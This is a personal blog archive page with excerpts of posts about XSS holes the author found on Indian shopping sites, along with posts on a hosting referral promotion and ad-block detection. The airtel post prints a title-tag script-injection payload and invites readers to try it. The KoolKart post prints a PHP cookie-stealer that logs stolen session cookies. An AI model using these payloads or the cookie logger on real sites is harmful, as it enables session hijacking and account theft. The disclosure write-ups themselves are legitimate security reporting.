Popular Tags:

Hey Snapdeal – You’ve got a XSS vulnerability [Fixed]

April 10, 2014 at 10:50 pm

Update: Got a mail from snapdeal security team, and this vulnerability has been fixed.
I just found a XSS vulnerability on a very popular Indian e-commerce site snapdeal.com. It was a bit tricky to find the XSS pattern, because searching for a string containing some  javascript functions such as “alert(” or “String.fromCharCode(“, were throwing “Access Denied” page. Though, the search string containing “eval(” wasn’t throwing any error.

snapdeal-xss-access-denied

Snapdeal XSS Access-Denied

XSS vulnerability found on shop.airtel.com

April 10, 2014 at 2:36 am

I was randomly browsing through shop.airtel.com and discovered a XSS vulnerability. This involves one of the simplest forms of XSS attack, known as end title tag attack. This vulnerability is present in such web pages where the search string is directly put between title tags, without sanitizing it.

So, by simply closing the title tag and putting the script tag after it does the trick. I searched for the following in the search box on the page shop.airtel.com:

</TITLE><SCRIPT>alert("XSS ;-)");</SCRIPT>

And there it was, the alert dialog box!!! (see screenshot below)

Note: This type of vulnerability is blocked by Google Chrome’s XSS auditor, so use firefox to test it.

airtel-xss

DigitalOcean + Black Friday Promo Code + Hacker News = $4000 in referral fees

March 21, 2014 at 1:55 pm

On the occasion of black friday, DigitalOcean offered $50 in credits (which is equivalent to 10 months free 512MB VPS plan).

digitalocean tweet blackfriday

I was already a customer of DigitalOcean, so I shared this offer on Hacker News. The post got 29 upvotes, 32 comments  and made it to second page of hacker news. I got around 400 referrals and made $4000 that day (most of the referrals were from Hacker News).

Awesome!!! Isn’t it? But there’s catch. I make $10 for each signup only when the referred customer adds $10 to his account  via Credit Card or Paypal. See the screenshot of my earnings below. Most of the money is still pending; and I hope that when free credits get over, people will actually pay for their VPS and I’ll get paid in return.

digitalocean-referral-income

I can only imagine how many signups this promotion would’ve driven and contributed to meteoric rise of DigitalOcean. I love DigitalOcean, but they aren’t offering any coupon code right now. One of the main reasons I tried them was the promo code which gave me 2 months of free hosting.

If you are interested in getting a VPS from DigitalOcean, click here. Use Promo Code: DEPLOY2DO to get free $10 credit.

Disclaimer: All the links to digitalocean have my referral code.

Simple way to detect ad blocking extensions/addons (and monetizing without ads)

October 5, 2013 at 3:56 am

Lately, I’ve seen a lot of people using ad block extensions/addons to block ads on the websites. Such extensions/addons reduce the clutter a bit, hence provide a better browsing experience to the user. But on the other hand, many sites solely depend on the ad revenues in order to keep them running.

In order to fix this problem, I quickly hacked a very tiny script which detects ad blocking extensions/addons. I’ve tested the script with AdBlock and AdBlock Plus extensions and it worked fine.

Here are the steps to detect ad blocking extensions/addons:

Popular (and not so popular) Indian E-commerce websites with XSS vulnerabilities

August 21, 2013 at 12:38 am

I was going though few Indian e-commerce websites and found XSS vulnerabilities in few of them. I’m not publishing injection patterns due to security reasons. If anyone from the companies listed below want to know the injection pattern for their respective websites, get in touch. Below is the list of websites which are vulnerable:

Find the screenshots for all the sites listed above (click to enlarge) :

KoolKart.com, get Kooler by sanitizing your input

October 28, 2012 at 3:50 pm

Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).

$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
if(!empty($str)){
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    header('Location: http://www.koolkart.com/');
}

The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart.

DealsAndYou, why you no sanitize inputs?

October 24, 2012 at 11:44 pm
Dealsandyou.com, Y U NO sanitize input

Dealsandyou.com, Y U NO sanitize input

Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.

Click to see full-size image.

dealsandyouthanks

I was looking at dealsandyou.com a couple of days back and something (may be their bad design) made me do a XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila!, an alert box popped up confirming my hunch.